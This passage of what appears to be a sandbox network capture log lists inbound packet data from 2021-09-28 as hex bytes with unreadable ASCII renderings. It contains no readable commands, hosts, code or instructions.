1b 2f 9e d5 b7 8b 5f c2 a6 51 e8 87 6e f3 6e 1b a2
                                          Data Ascii: >wt/ _0O'O,V+Eu?Q&IFt1'ish0BR.=| "NI*M{&*3{801EUU8aL'H*\2&! ?dCINXL1|<{#{dc(6r4}rgMyUY[.-/_Qnn
                                          2021-09-28 06:58:06 UTC86INData Raw: 59 b3 54 d9 ec 42 05 ec ee a9 55 b5 2d 4a 12 f9 e0 b7 ff ae 57 e7 f0 81 08 d6 0d 77 1f 0f 25 c9 1b 8e cb 09 25 6a 00 d0 e2 30 76 4d 84 cf 1d dc d1 32 91 96 c9 fa d0 b0 f7 dc 14 de 53 b9 7b 01 b8 7a dc dd e8 c8 30 b3 22 a4 8a 96 b3 1c 90 62 7d 8d 70 84 99 d7 fb 7d 4d e0 b3 5f 38 95 83 b9 d0 7c f8 85 68 d5 8c ee 04 d3 11 5b ae 71 48 af c7 db 32 d4 3a 42 12 f9 b2 ca e5 8b e4 90 d9 9d 43 ff bd 2f e8 73 2a 52 67 63 ab 0b dd c9 97 61 4f 6f 7c 3c 73 ce 2a a9 17 2e 3c df 36 76 16 77 cb 1c de 11 5a 95 b2 a4 b4 43 1d 25 e1 b4 cd 0a 67 bf 00 06 f7 66 a7 8f 19 d9 b5 81 7d 30 08 05 b0 93 5e 2f b6 26 94 9e 34 c1 59 c2 e8 87 17 13 6b b5 a7 00 a6 f1 4f 50 f3 84 08 26 3d 1b 32 05 23 21 c3 04 d5 11 2a d4 9d 87 ff 9f d7 7b d4 ee e8 d6 98 01 aa cb 41 05 fa 78 77 51 41 16 26
                                          Data Ascii: YTBU-JWw%%j0vM2S{z0"b}p}M_8|h[qH2:BC/s*RgcaOo|<s*.<6vwZC%gf}0^/&4YkOP&=2#!*{AxwQA&
                                          2021-09-28 06:58:06 UTC87INData Raw: 79 4c c3 7e 91 b3 53 c0 9e c1 32 5b 47 a9 18 18 05 8e cb f0 55 37 4c 19 48 6e 6a 35 22 d4 ab 93 85 e5 1c 20 e3 3b 82 37 7d 8f d1 6b 17 65 d1 a0 6b 51 c5 6f f3 66 1a aa 47 bf 61 82 9f a7 77 ee d6 a9 49 67 c3 26 e7 e1 7c 60 bd 72 01 2e 57 4a 5a b7 f4 9b 78 78 d5 3a 16 db e2 c8 e5 5a b7 16 65 e9 1a 87 85 84 33 8c 8b f3 0c e0 cf e6 39 fe 19 c7 1e 5f b5 2d 1c 74 c6 5d 98 ea 48 b6 8f 51 0b 32 a8 ce 4c 0e f2 9d 02 47 b1 87 33 f6 96 ae 43 1e 69 69 53 b1 1e d9 54 bc 4c da d7 26 ae 39 82 56 2a b1 74 a1 b4 54 61 5f f6 f9 9f 31 1b 0a 98 8b eb c2 67 26 ab 03 16 25 ba 45 48 46 fb 21 48 4c 23 ef 05 1a 2a 24 e7 23 d1 39 13 60 44 93 a0 19 02 1e c0 82 8c 93 07 bf 1e 61 3c 3f bf 1e e8 22 1f 8d ad 54 a3 8f 11 58 8b 9e 83 2e 1c bb 46 1b 0d 62 1b 1a ff 50 16 59 4f 46 2d 73 98
                                          Data Ascii: yL~S2[GU7LHnj5" ;7}kekQofGawIg&|`r.WJZxx:Ze39_-t]HQ2LG3CiiSTL&9V*tTa_1g&%EHF!HL#*$#9`Da<?"TX.FbPYOF-s
                                          2021-09-28 06:58:06 UTC88INData Raw: b4 a5 cb 71 8e 53 18 02 23 7c c9 e6 13 a9 e4 5a e8 f0 a8 75 0c 01 d0 32 0f 36 2c c3 0d 8c b7 01 d4 9f fe 1a d6 d5 7f 69 83 86 11 98 0b 0c e6 66 39 83 b3 7d 40 40 6c 73 d7 f0 b3 52 31 eb 49 38 85 b5 38 20 b1 82 dc b9 c8 66 12 2b 4d 5e 0f ac a8 34 f1 1a 8f 1c 51 38 8d 32 1d fb a9 72 3e 28 3a a6 ee 72 86 b2 e8 a8 9c 29 9e 3b ca b0 55 81 33 87 08 ea 91 69 f9 24 a7 5c 9c d4 ce c0 d9 ef a4 3a f7 f8 ab 23 70 b3 29 b5 42 a7 a3 71 b5 26 95 99 d8 81 cd 8e c3 00 52 21 57 a5 58 4c 6a 2f 2a 69 6e 23 ed 33 0b 91 81 93 43 7c d5 33 9a 86 6d 31 d9 9f 60 dc 5f 70 53 bc 35 d3 d5 8b 2d 5c dd f4 5a 8a 4b 91 73 e1 3b 3a 79 68 5b c1 06 36 f0 f0 f5 cd 52 90 39 54 80 9f 00 fd 38 cb a6 4c e1 5b 6a 3a ac 95 c8 85 ec c9 fc 2d f1 88 e0 52 03 b2 b5 97 cb f4 e3 56 de 85 4b e0 b5 a6 a7
                                          Data Ascii: qS#|Zu26,if9}@@lsR1I88 f+M^4Q82r>(:r);U3i$\:#p)Bq&R!WXLj/*in#3C|3m1`_pS5-\ZKs;:yh[6R9T8L[j:-RVK
                                          2021-09-28 06:58:06 UTC89INData Raw: fd 5d 4a db 07 13 66 6f 93 99 19 79 ff c0 82 88 9c 16 b9 d9 f8 1d 14 a4 1c ed 32 6d ca 81 56 ba 95 1d 58 11 26 82 02 1f 84 e6 1b 0a 70 cd 28 d2 52 37 4c e8 9a 2f 08 52 54 02 51 87 a0 a1 de 90 c2 e6 97 9f a5 e4 40 40 bb a2 42 7c a8 bd b9 77 e3 a3 da bb 81 69 65 48 33 43 9e 54 ad 99 ef d0 a3 21 5e e5 fd 5d 9e 8f f5 7a d4 e5 58 11 a3 ef a9 57 31 85 75 08 ef eb a6 f7 ab e5 18 dd b7 40 d6 74 bf 6c 31 23 ca 9e ba a1 7a 63 13 d0 da ca 72 fa fa bc ff 4e f4 ca 33 8b fe 5b 05 d1 9a 86 f5 1d de 5e dc ba 02 94 72 df 9f c1 6b 38 ca 92 63 8a 92 b4 e0 fb 60 7d 85 23 16 9b d7 f5 51 94 c8 b3 55 57 03 b2 ba d6 88 b5 96 67 6d 9d e1 0a e1 fc 5e ba a8 59 a6 dd e5 f2 d3 25 49 f3 dd 8d c3 f1 b0 f4 83 c0 67 42 c2 b3 26 e6 9e 26 6d 6b 74 a9 29 f4 d6 8c 7d 53 91 6c 14 7c 32 50 43
                                          Data Ascii: ]Jfoy2mVX&p(R7L/RTQ@@B|wieH3CT!^]zXW1u@tl1#zcrN3[^rk8c`}#QUWgm^Y%IgB&&mkt)}Sl|2PC
                                          2021-09-28 06:58:06 UTC91INData Raw: 11 4f 28 79 6a 43 a1 35 25 f8 d2 ab a6 21 de 2a 59 e5 a0 47 ff 32 ae aa 09 e3 5d 76 31 c6 05 da 83 fc ab c5 a1 46 95 44 7e 17 a1 b0 94 a2 e7 e4 4d f9 5f 5f ce 98 a4 ae f4 f0 80 2c b1 2a e6 00 da 2e 40 49 4e ec 93 a7 a9 58 6d 9a 65 76 42 20 8e e5 9d fe df 1f 79 a1 ef ac 2a a9 cf d8 2a dd e7 ab dc 21 e5 fb cd 73 4c 59 78 91 bf 48 c9 9c c1 2f 20 9d a1 77 04 2f 9d c3 e9 6c 7a 9a 0a 53 68 ad a9 1a 5a 1c ae 5a d0 e3 df 39 22 af 37 10 8f d1 6b 17 64 ea 9e 53 c0 ca b1 f3 62 33 d9 79 fc 7d 88 81 cd 04 aa d4 b1 43 4f 85 a9 e6 eb 6d c3 a4 aa 72 60 55 4a 50 85 b2 99 79 44 ff 03 66 da e8 da 9d f6 e4 14 63 e8 33 f4 bb 95 03 84 94 a5 66 93 8b e1 39 f4 20 94 17 74 a4 3b 35 67 3f 5f 63 e3 52 ba 0b 39 9c cd a9 e4 c2 26 f9 9d 04 4c 43 84 18 70 ac a0 40 a7 6b 12 0a dc 9c d2
                                          Data Ascii: O(yjC5%!*YG2]v1FD~M__,*.@INXmevB y**!sLYxH/ w/lzShZZ9"7kdSb3y}COmr`UJPyDfc3f9 t;5g?_cR9&LCp@k
                                          2021-09-28 06:58:06 UTC92INData Raw: 61 5c b4 97 67 d5 82 ed 08 fd ef 4b 88 62 53 58 dc c9 e9 c6 3c 55 db cf a7 da ee 89 e1 8f c2 69 5a 2d b6 15 ea 76 2c 58 70 76 a0 09 d8 d7 78 6f 7b 97 56 cf 7f c5 42 65 17 3f 32 c3 a7 19 08 56 80 36 cc 14 d4 3b 77 a7 ab 44 01 30 c1 5b c6 39 4b 48 10 23 f8 61 a2 06 08 c6 d5 5b 00 19 11 fb b1 bf 58 2c a5 61 d5 a5 af c1 48 c2 4e 14 f6 33 54 b5 a0 06 73 f9 a4 23 d9 a8 7f 25 4b cd 3f 16 2d 29 c3 0a 1c 97 ff d5 b1 8e d0 c7 d1 f5 69 3a 98 0f 92 12 a4 cd 23 31 e7 6c 83 41 68 77 73 d4 30 35 70 20 ee c5 f4 7d 80 39 24 aa 90 cb ad b1 58 01 21 58 5c f9 de c0 30 da 3a b8 4e 40 32 87 32 13 95 16 71 12 25 03 e4 c1 cd 92 89 a5 aa 8d 29 95 c0 da 91 dc be 20 81 11 82 56 69 e8 2a 0f 25 e6 d4 e2 cc e0 ab b1 ec ee 52 a5 30 09 a8 2c b5 45 37 85 8f b4 08 e9 42 cb 89 d6 48 67 19
                                          Data Ascii: a\gKbSX<UiZ-v,Xpvxo{VBe?2V6;wD0[9KH#a[X,aHN3Ts#%K?-)i:#1lAhws05p }9$X!X\0:N@22q%) Vi*%R0,E7BHg
                                          2021-09-28 06:58:06 UTC93INData Raw: 63 e6 08 ff ac 50 a9 95 98 95 1d 4e 8b e4 3d d8 7f 93 1a 4e b3 2f 1a a6 c5 5e 49 f7 c7 b6 0b 3e 8b 27 bc dc e8 92 f2 9d 09 7c 21 85 34 78 96 ae 7f 6c d7 6b 59 d8 8a 55 53 ba 5f d1 c1 35 36 57 21 56 2b aa 50 fc 38 12 6b 4e fa a5 06 31 1b 02 b2 c3 33 c2 6d 35 0f 49 16 25 bd 7e 71 6c bc 3a 66 07 2f fb 27 a3 af 25 e1 33 d0 01 13 60 44 94 bd 0f 51 76 c0 82 82 b2 8a b9 c8 e4 07 33 ab 34 54 27 93 cd bb d9 a5 9e 1d 5e 13 cc 97 06 be 93 ed 11 25 32 33 29 f4 41 11 3a f1 79 2d 71 8d 7c 77 55 09 11 98 d4 81 db c0 ba 90 d3 f5 4a 48 9b 0d 43 6d b8 90 84 3f e4 8f c2 54 8b 52 b1 43 33 52 92 5c 5c a6 eb 2b 48 f4 55 e9 c4 d6 86 71 f4 54 a2 3a 5a 6a 6c ed d2 8f bf 32 43 8f 41 f7 7c 6a a2 15 1b 8a 70 44 d4 0b 58 77 20 21 ce 00 94 b0 74 15 5a 00 da c8 74 0f 94 8e e7 5e f6 a4
                                          Data Ascii: cPN=N/^I>'|!4xlkYUS_56W!V+P8kN13m5I%~ql:f/'%3`DQv34T'^%23)A:y-q|wUJHCm?TRC3R\\+HUqT:Zjl2CA|jpDXw !tZt^
                                          2021-09-28 06:58:06 UTC95INData Raw: 18 f4 c4 ce 8e 9a a9 bc 11 24 8f 3e da a9 ce bc 1b 24 0a 91 56 41 e8 20 10 39 77 b8 cc c6 fb 85 b7 31 d5 7e b9 27 1c cd 40 a6 4f 22 ac 7f b0 35 e5 3b 0a 81 c9 52 25 1d 52 76 76 bb 8a 7f dc 3f 27 78 28 36 7c ca eb 3e c4 9d 7c 25 c7 35 81 ac 2e 31 e3 ee 00 30 b0 4b 4b ad 64 c2 c7 ef d1 33 b3 f2 59 04 c9 85 22 14 2e 01 ca 6a 58 b2 29 24 e1 f5 fb 71 4e dc 3a 54 80 b3 6e 90 3a c1 84 27 ed 58 71 32 d5 00 c6 ea 05 ba c2 25 a0 a9 8c 63 05 f4 93 b6 8f d6 58 5d f6 ce 1d cb bb b1 b7 b5 a3 ba 5d 28 2a d3 0e 9c c6 41 43 57 d5 56 b7 bc 61 05 bd 6d 27 59 37 9f 6e 81 fb 18 1e 69 8a 8f d3 3e 98 14 da 33 dd f0 d1 d4 75 f4 ef cd 6a 73 5d 13 99 b8 27 e9 9a e9 46 24 8c a3 35 0e 20 99 8f d4 74 69 6c a2 43 79 bc ec 23 d0 af 8e a8 7a 37 0f e4 25 9c 0e 36 e0 3e 61 04 7e 93 ae 42
                                          Data Ascii: $>$VA 9w1~'@O"5;R%Rvv?'x(6|>|%5.10KKd3Y".jX)$qN:Tn:'Xq2%cX]](*ACWVam'Y7ni>3ujs]'F$5 tilCy#z7%6>a~B
                                          2021-09-28 06:58:06 UTC96INData Raw: ca e7 44 ee f9 58 90 0c 19 56 d9 e2 58 69 15 0a a9 53 bb 30 43 7c 10 e0 a6 f4 b3 3b 19 b1 ac 44 59 24 74 6c 30 5a 2e 11 90 a5 78 12 1b 02 da c0 0b 97 4d 8e e3 58 a5 32 38 8b fd 4f 94 9f b7 84 e8 14 ad 2a c5 44 09 c5 94 f4 9d ee ca 41 55 59 63 8e 94 d8 20 d0 60 77 85 23 25 9b d7 f5 57 75 05 b3 55 53 06 80 c2 31 63 b5 92 e9 62 f2 95 19 f7 e5 58 f9 99 59 a6 d9 e7 98 30 3a 42 09 ca a3 be 02 9a eb 8b 5d d4 2d a7 b5 39 e5 62 5c a2 63 7c a4 0c 2c cf 31 6f 57 97 0e 65 62 cc 5b 00 61 2c 38 d6 b0 9c ed 7a 8b 3a c9 ef 5c 3b a0 ab b2 21 67 38 c1 40 a3 50 44 b6 1b 0d e9 0a 46 19 06 d1 f5 5b 11 00 38 06 b0 73 5f 2f b6 ac cf b6 b4 d7 4a ce 69 ca 09 32 78 ba b6 17 be 10 73 82 f1 b0 6c 22 46 c3 34 18 d9 28 fe 0a 01 98 7c 38 9d 85 d3 c8 c6 7d de fd 95 08 66 00 82 c3 30 40
                                          Data Ascii: DXVXiS0C|;DY$tl0Z.xMX28O*DAUYc `w#%WuUS1cbXY0:B]-9b\c|,1oWeb[a,8z:\;!g8@PDF[8s_/Ji2xsl"F4(|8}f0@
                                          2021-09-28 06:58:06 UTC97INData Raw: e5 d6 fe 0b ab fc dc 71 75 8f 76 bd be 21 97 09 c1 29 27 a6 aa 30 62 2c 9d c3 ee e7 66 92 17 67 51 8b b8 08 de a6 b9 c0 2e 1c 2a 39 2d 8d 35 27 8e c1 61 04 74 c2 86 53 cb eb 6f fd f1 19 d9 78 57 63 a0 96 cd 04 a0 d6 bf 3e 45 84 24 e3 e9 7b 1b ae ab 72 6b 57 39 2f 9d b2 93 05 7e fc 7d 10 d9 96 43 8a de bc 6b 6c e3 19 f0 b9 92 4e 96 95 97 62 91 9d 8e 44 e5 30 82 18 75 85 39 25 1f 7c 5f 4f e7 48 99 8b 3c 8a 39 82 e2 c3 1d f4 9f 6c 9c bc 85 32 58 87 a2 6b 57 59 6a 59 b8 9c d8 54 74 5f d0 c4 35 a2 6b 83 56 2f 80 cd a7 38 12 49 de f5 d1 3e b1 0e 01 b0 bc ca c2 6c 31 27 b1 6d 25 bb 6c fb 53 fa 2b 64 00 5d fb 0e 75 af ab 50 32 87 0b 18 4b 6a 87 11 11 6f d9 c6 95 d7 8c 20 b5 e8 ce 95 87 52 1a fd 41 f2 c1 86 50 a4 89 79 55 0f cf 55 22 15 8e dc f9 73 7c 32 29 fa 57
                                          Data Ascii: quv!)'0b,fgQ.*9-5'atSoxWc>E${rkW9/~}CklNbD0u9%|_OH<9l2XkWYjYTt_5kV/8I>l1'm%lS+d]uP2Kjo RAPyUU"s|2)W
                                          2021-09-28 06:58:06 UTC98INData Raw: c1 08 cf f6 b3 ba c2 25 fd 9f 8d 69 01 a3 bb a5 75 f7 cf 59 dd 24 52 f3 bb b5 b9 e1 ea 6f 22 0c 39 e1 62 e4 ec 82 48 44 c2 4a b8 ba 56 45 af 61 6f b6 32 a4 f1 85 e3 13 1f 72 b0 f1 b9 24 66 1f e5 25 cf f6 f7 ec 3a f6 f9 dc 6a 60 9c 82 90 95 24 fb 8d c5 29 37 88 b2 e6 1d 02 98 d0 f2 61 7e 48 19 53 7d a2 46 09 f8 a0 98 fa 53 11 21 e7 29 95 16 34 8b d1 70 00 62 3c a7 7f c3 d7 7c f7 64 08 dd 66 b4 9f 89 ad cf 2f af ec c0 bc b0 7a 2d cd eb 6d 66 b6 9a 70 6f 1e 4a 50 9f 60 99 78 63 ff 12 96 d9 e8 da a7 d1 b5 01 4d e9 31 da b9 86 35 f5 17 95 66 99 f1 97 82 f5 31 84 17 58 bd 46 3c 71 c1 5a 48 e2 37 a3 0a 3e 8e 34 ac b5 d3 30 f2 99 04 3b 66 84 34 74 ab a0 6c 6e 6d 44 5f d9 f3 10 55 ba 59 a3 51 23 22 75 f8 56 38 90 7e a6 0f 12 61 5f 24 d1 34 20 19 7b a2 b9 ea c6 7a
                                          Data Ascii: %iuY$Ro"9bHDJVEao2r$f%:j`$)7a~HS}FS!)4pb<|df/z-mfpoJP`xcM15f1XF<qZH7>40;f4tlnmD_UYQ#"uV8~a_$4 {z
                                          2021-09-28 06:58:06 UTC99INData Raw: f4 c3 62 42 d7 9b 97 f0 6f 34 44 63 6d a5 07 c0 37 87 42 5b 93 06 1e 61 cc 55 43 08 31 2b cf b7 e7 18 7f 9d c0 dc 3d 59 9b b2 ae b4 43 17 25 d6 b4 cd 0a 44 9d 14 37 17 8a 51 e6 2c c6 ef 5e 11 16 0a 05 b0 4b 5e 2f a7 64 b4 a6 a4 c1 5d e5 5a 30 c9 36 78 bc d4 92 ab ee 78 d4 81 d7 7d 24 4c de 24 0f 1f fc d3 00 03 9c 7a c4 9c 85 d3 d0 fd 68 df ec 99 03 88 10 be a3 12 6b b3 79 7f 2a 04 a2 63 d1 26 3e 03 21 ea 4b 47 53 ab ee 0c 2b 8d de b4 9b 58 18 2b 47 10 11 21 ed 20 0f 11 b4 5d 51 43 97 22 19 8c ee 6f 34 f4 3a 6b ee 72 86 89 a2 a8 e7 33 8e 3e df bb c5 a4 e5 af 19 90 5c 63 ea 2e 12 48 08 d4 ce c2 f7 bc b6 ec d5 49 bb 27 10 b1 29 a6 34 38 8b 71 b1 22 f1 40 0e a9 da 59 74 19 38 23 5e b0 f5 4f 66 3e 23 7e 63 05 ae e6 e7 6f 90 9f 3a b9 cc 37 f0 90 7d 20 e3 ff 85
                                          Data Ascii: bBo4Dcm7B[aUC1+=YC%D7Q,^K^/d]Z06xx}$L$zhky*c&>!KGS+X+G! ]QC"o4:kr3>\c.HI')48q"@Yt8#^Of>#~co:7}
                                          2021-09-28 06:58:06 UTC100INData Raw: e1 1a 3b 82 5c 62 c9 c0 37 de 83 12 50 ac 80 4f 6b 86 a2 6f 4c 78 6c 22 c4 9d d8 50 ab 5a ab f1 20 22 7b ed 92 2a a0 7e 80 2a 14 49 c8 f5 d1 3e 1c a1 de be aa ec 3c 7b 16 27 3c 0d 4a ec 6d 7b 4d 27 29 30 79 eb ee 0f 73 ba 21 88 ed 5c 06 15 62 15 fb a4 1a 79 d1 e8 bb 88 9a 1c b0 ca be 6d 32 be 1c ee 0d 0b c9 ad 5e a0 9c 4d 24 0a d9 83 2a 1f c3 96 09 0c 68 37 01 3c 51 1c 48 92 a7 06 5b ae 54 02 5f 1f 1c a3 e6 90 d1 dc 4a 80 d9 cc 71 40 b3 a8 6e 6b b7 9e ab 2c e3 ae c5 6d b1 45 67 5a 14 45 91 65 6a 98 c3 de 6b 1c 6e e9 d7 5a 87 59 f4 56 db e6 60 6a 3a 63 a9 5d bf 32 47 01 f6 e0 8b f0 1a c3 19 ff b7 44 d4 0e 76 6c 1c 27 70 f7 90 bc 7a 61 68 00 c9 fa 72 74 8b 8e e7 5a 03 d1 38 9a ef 5e ff e8 1c 84 e2 16 de 48 c3 53 fd b9 5c f7 85 f9 cc 3a a0 5d 78 74 97 9b 64
                                          Data Ascii: ;\b7POkoLxl"PZ "{*~*I><{'<Jm{M')0ys!\bym2^M$*h7<QH[T_Jq@nk,mEgZEejknZYV`j:c]2GDvl'pzahrtZ8^HS\:]xtd
                                          2021-09-28 06:58:06 UTC102INData Raw: c0 ea 5d a7 16 f4 24 af 26 1a a6 20 b8 5c 2e 8a 60 b3 3b e2 aa d9 ad c0 60 15 11 56 30 45 bf 9d 59 67 2f 21 61 82 1c 54 c7 dc f9 90 95 5e a6 dc 26 8d 80 6d 26 f8 f6 64 22 8c 54 58 c6 3b d2 d7 f4 e8 27 c4 f1 59 0a f2 13 31 1b 31 2c 61 05 f1 b2 38 3e ef ea ff a1 21 c5 3d 4b 90 49 47 d3 23 c3 f5 05 e2 5b 64 02 c3 90 c9 85 c2 23 c0 2f fb 94 86 02 a8 b2 bf b5 94 ed f0 5a f6 df 4f ff ac 4b a9 c9 d5 93 58 2e 34 e9 65 f0 c7 3a 52 45 c4 43 c9 7b 53 45 b8 4d ec 4a 33 82 e2 88 86 a0 0c 76 ba ff a9 2f 9e 1e d8 24 d0 1f c5 d6 33 ed fe a7 61 65 8b 78 fe 21 27 e3 94 ca 34 35 8a a9 09 1a 31 8d 37 f9 51 4f 4e 62 4c 78 bc bc 0a d7 d0 b0 f9 2e 18 4f 32 2c 8a 19 0f 15 d3 61 0e 62 d8 c9 fa c0 c0 65 ec 75 0a df 79 ac 67 97 90 33 05 86 c8 ab 38 41 84 24 e3 e8 16 46 a4 aa 76 47
                                          Data Ascii: ]$& \.`;`V0EYg/!aT^&m&d"TX;'Y11,a8>!=KIG#[d#/ZOKX.4e:REC{SEMJ3v/$3aex!'4517QONbLx.O2,abeuyg38A$FvG
                                          2021-09-28 06:58:06 UTC103INData Raw: 9b af 3f c5 0e 74 68 e7 0f 52 13 90 ab 6c 7f 07 a9 da ca 7c 6b 41 9d e3 5a cf d5 2f 75 f8 61 f8 c8 a5 80 e2 07 da 46 d3 ba 02 94 79 cc c3 14 37 c5 ae 4c 70 8e 96 a6 6b ce 70 83 86 74 d1 99 ac ff 54 0e e6 b5 7d cc 12 82 b3 c0 7d da 3f 67 d5 97 fe 0a e4 eb 5a 93 79 46 a8 23 e4 cf fc 38 39 03 dd a1 c1 ff 17 c0 8f d3 62 4f da a1 26 bf fc 2e 56 7c 37 3c 11 ca d5 1a 67 4e 8c e1 19 76 d6 3e c6 17 2e 32 c3 bd f4 0d 7a 9a 3a c2 09 a4 8d 8d d5 b6 29 1c 3b c1 4e d3 2a cb 9d 11 0f ff 7a a7 0f 26 2a df 5b 11 8f 01 12 90 6c 5e 2f b6 fa c6 ae 85 3e 59 c8 51 84 01 2b 58 45 a7 11 a9 72 7b b4 d2 57 7f 24 46 4e 3b 1e 07 d6 d2 00 03 02 08 c8 bd 7a d7 d6 d5 e7 d7 f1 b3 ef 98 01 ae 51 3b 25 d8 87 7d 40 44 f9 6b ce 2f 1c 87 31 eb 4b df 5c aa 32 04 5f 8f de be 27 51 0f 20 67 b0
                                          Data Ascii: ?thRl|kAZ/uaFy7LpkptT}}?gZyF#89bO&.V|7<gNv>.2z:);N*z&*[l^/>YQ+XEr{W$FN;zQ;%}@Dk/1K\2_'Q g
                                          2021-09-28 06:58:06 UTC104INData Raw: 4c 19 48 66 b3 ab 00 d4 ba 99 e7 0d e2 21 cb 21 88 1c 23 e0 05 60 04 72 dd 82 40 c8 c0 7e fb 72 e7 d8 55 be 76 9b 89 cd 15 a2 cb 8d bd 4e a9 26 cc ee 55 db 59 55 8d 45 46 7a 53 9f ce 99 78 72 1d 7d 14 ca fe db a1 c5 b6 11 74 1c 18 d8 b9 9e 38 86 93 81 98 92 a7 e6 2e ff 31 85 04 a1 be 17 30 5b c3 75 ac ee 4b 99 94 3c 8a 39 c4 eb c0 31 f2 9d 03 54 bd c5 6f 5a 16 a2 6b 4e d0 66 58 f6 3c da 54 b0 44 b2 bf 41 2d 7e aa f7 29 a0 72 b9 33 70 0b 3f f8 d0 1c 93 19 00 ba a7 fa a0 07 51 28 3d 3e 86 b9 6d 71 58 ee 49 0a 76 2c ee 27 d1 a9 25 ed 05 e1 01 13 60 9f 9f b0 79 13 b5 78 a8 9b aa 11 b9 e3 ef 16 3f 5c 1c ea 34 85 d8 a5 6c b9 9f 1d 5f 07 c9 8b 33 e3 92 c1 17 0e 77 2c 76 e6 89 98 5d c5 67 3e 7b 99 45 0a 4f f7 16 a7 d2 93 ce c6 f0 80 cf bb c4 4a a8 b1 4a 6d af be
                                          Data Ascii: LHf!!#`r@~rUvN&UYUEFzSxr}t8.10[uK<91ToZkNfX<TDA-~)r3p?Q(=>mqXIv,'%`yx?\4l_3w,v]g>{EOJJm
                                          2021-09-28 06:58:06 UTC105INData Raw: d7 31 0d 38 25 04 28 38 9f 01 de b5 2d d5 d6 df 06 ff ed 93 14 87 19 bd c5 32 2a f0 63 83 41 68 6e 61 d9 0e b7 7a 31 e1 40 5f 46 bd 38 35 a8 90 cd 40 ba 74 1f 28 4f 51 d1 f7 67 34 f1 1a b4 5c 4c 2c 94 2b 19 99 e0 6f 31 dc 13 cc f8 77 8f 92 b0 be 4a 0b b4 3f db b7 a7 b4 32 87 0e 8e 4c 7a f1 20 01 3b 07 cc 30 c7 dd ba a3 39 f5 45 a6 f1 32 99 2d a4 45 00 22 73 b5 2e 93 76 d9 81 cd 47 6e 00 5e 30 4b ba 91 55 99 3f 0b 74 6d 19 6f 8e 63 90 6f 6a 4b a1 d5 3d 8b 91 74 3f f1 07 9b 0f ad 59 5f a2 2d 93 cf 0f 14 a3 c2 e7 4a 06 da 9b 3b 04 2e c4 78 46 54 a3 3e 23 b0 f9 13 58 de cb 2d 47 82 b7 57 f7 27 cf 70 0a cf 4a 65 59 df 10 c9 81 ff d4 82 0b 0f 7d 61 72 0e a1 b7 bf 9a fe fc 4d 08 cf 65 f4 ba b6 a0 fa eb 47 0b 1b 34 e9 6b 8f d9 40 49 40 db 55 b5 a1 52 54 b6 7a 6e
                                          Data Ascii: 18%(8-2*cAhnaz1@_F85@t(OQg4\L,+o1wJ?2Lz ;09E2-E"s.vGn^0KU?tmocojK=t?Y_-J;.xFT>#X-GW'pJeY}arMeG4k@I@URTzn
                                          2021-09-28 06:58:06 UTC107INData Raw: 25 bf 1c eb 36 a3 c9 ad 7c a2 9e 1d 57 07 d8 92 38 16 b8 f6 1b 0a 7f cd 28 d2 52 04 45 c3 7e 3b 8d 98 78 00 42 02 17 8c c6 6e d0 fa 96 b4 d2 cf a3 42 c8 b8 43 6d ba 9c e8 2e cb b3 cd 45 8a 47 78 4a 10 f8 99 4d 59 b0 23 d0 b7 0d 6c 50 fd 5a 8c 0c d3 57 d9 e2 70 6a 7b df ad 53 76 33 47 01 11 e0 a6 e1 a7 08 1d c9 16 45 d4 0f 74 7d 35 3d 37 10 bc b5 78 1a 40 01 da ce 71 00 a7 8e e7 5b b1 61 3a 8b f3 56 e8 d4 b6 95 e6 01 20 58 eb 47 1b ab 74 f4 8c ee d4 c4 b0 75 6d aa 96 b3 6f d1 ed 56 87 58 c7 91 ca e2 51 0e f3 b7 4a 5e ee 83 95 ff 61 ce be 66 d5 99 c9 40 f6 ef 50 aa 9f 5d a6 db cd 52 d5 3a 48 25 f8 a1 c5 ef f5 73 8f d3 69 2d 81 b6 39 e5 46 38 4b 70 78 a0 09 d6 d6 8b 90 56 bd 69 19 48 2f 55 6f 11 41 a5 dc b2 ed 33 42 8a 3e dd 0e 54 9f a5 ab a5 56 0d 30 3f 4b
                                          Data Ascii: %6|W8(RE~;xBnBCm.EGxJMY#lPZWpj{Sv3GEt}5=7x@q[a:V XGtumoVXQJ^af@P]R:H%si-9F8KpxViH/UoA3B>TV0?K
                                          2021-09-28 06:58:06 UTC108INData Raw: d5 9a 23 40 5b 60 28 eb 4b c9 85 e0 b0 1c 3f d4 aa a9 6d 01 b8 b2 a9 81 de db 5c f6 c4 97 e0 b9 9f a8 e5 f7 d0 3f 20 35 e9 61 f2 c4 41 49 44 c4 b4 a7 a9 52 b6 bf 65 76 58 33 88 f4 88 e9 09 0d 6d 80 e5 bd b8 99 1e c9 c8 cc e1 d5 d2 d0 e1 fd da 71 66 f0 5b 90 b9 23 cb b1 c1 29 2c a1 a5 1a 67 09 9c c9 fc 55 5d 4c 19 48 5f be c3 2f d5 ab 95 d0 da 18 20 e1 05 ae 1f 27 85 f9 50 04 74 c8 8b 34 b3 72 6d f3 6e 12 db 16 59 60 88 87 c1 03 a2 d6 d2 64 4e 85 20 cf 1f 69 66 a3 82 56 6f 55 40 3f 2c b0 99 72 ac bc 58 3c ec e8 d0 80 d3 b1 3e 96 e6 19 f2 b9 fd 14 87 94 93 4e 67 8f e4 3f dc 15 82 1c 55 d0 88 30 70 cb 80 43 c9 7d b1 0b 34 a2 0b a8 c8 ca ef f2 b5 3b 54 bd 8f ea 78 80 8e 6d 43 06 3e 59 de 96 04 56 c1 78 d1 d5 25 0a 8b 86 56 2d 88 5c a6 38 18 49 6e f7 d1 3e 08
                                          Data Ascii: #@[`(K?m\? 5aAIDRevX3mqf[#),gU]LH_/ 'Pt4rmnY`dN ifVoU@?,rX<>Ng?U0pC}4;TxmC>YVx%V-\8In>
                                          2021-09-28 06:58:06 UTC109INData Raw: 80 db a1 c5 e4 89 e5 9e dd 75 53 da 15 28 e1 73 28 50 6c 68 b4 0f 5f e6 86 6e 56 82 6d 01 70 da 46 f3 06 3e 2f f4 15 e7 09 70 ad 2f cd 07 ca a0 be ba bb 44 88 12 d0 4a cc 2c 96 a4 11 0f e5 5f ba 19 06 df f7 6f 10 13 02 71 a2 93 5e 34 a5 6f d0 d6 af d0 50 46 e6 0f de bf 53 ba a7 10 ba e9 63 a7 e3 af 69 4b e0 d0 32 0f 36 2e c3 09 8d 29 07 60 01 99 5b e9 d5 7b df e0 8c 00 9e 1e a1 92 e4 b7 c7 78 7d 41 42 7f 01 5d 19 3c 78 30 e3 63 70 54 b5 32 0c 17 8d de b4 b0 70 a8 29 47 45 14 d5 c4 6d f0 10 ad 59 3c a0 87 23 13 9b e3 6e 2f 29 9c 57 3a 65 56 8d 79 27 b7 23 8f 3f c8 b0 cb af 25 96 07 87 42 41 ef 21 10 39 09 de 